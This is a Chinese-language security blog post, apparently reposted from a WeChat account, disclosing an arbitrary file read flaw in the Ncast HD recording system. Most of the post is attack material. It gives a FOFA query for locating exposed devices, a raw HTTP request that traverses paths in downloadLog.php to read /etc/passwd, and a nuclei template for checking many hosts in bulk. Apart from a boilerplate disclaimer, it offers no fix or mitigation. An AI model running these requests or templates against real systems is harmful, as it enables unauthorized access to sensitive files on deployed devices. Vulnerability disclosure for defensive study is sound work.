Ncast高清智能录播系统存在任意文件读取漏洞

admin
admin
admin
139598
文章
114
评论
2024年5月7日07:54:36评论39 views字数 1072阅读3分34秒阅读模式

漏洞简介

Ncast 录播系统能将授课或演讲者之影像、声音及上课讲义,以全硬件设备方式即时记录成标准的网络流媒体格式,并通过网络及服务器同步直播。

FOFA语句

title=="高清智能录播系统"

Ncast高清智能录播系统存在任意文件读取漏洞

测试截图

Ncast高清智能录播系统存在任意文件读取漏洞

    POC如下:

GET /developLog/downloadLog.php?name=../../../../etc/passwd HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: close

Ncast高清智能录播系统存在任意文件读取漏洞

nuclei批量验证:

id: ncast_arbitrary_file_readinfo:  name: Ncast任意文件读取漏洞  author: maoge  severity: high  description: Ncast高清智能录播系统任意文件读取漏洞  reference:    - https://example.com/  metadata:    verified: true    max-request: 1    fofa-query: title=="高清智能录播系统"    hunter-query: web.title=="高清智能录播系统"http:  - raw:      - |        GET /developLog/downloadLog.php?name=../../../../etc/passwd HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0        Accept: */*        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2        Accept-Encoding: gzip, deflate        Connection: close    max-redirects: 3    matchers-condition: and    matchers:      - type: word        part: body        words:          - bin/sh          - root

原文始发于微信公众号(Rock sec):Ncast高清智能录播系统存在任意文件读取漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月7日07:54:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Ncast高清智能录播系统存在任意文件读取漏洞http://cn-sec.com/archives/2713413.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息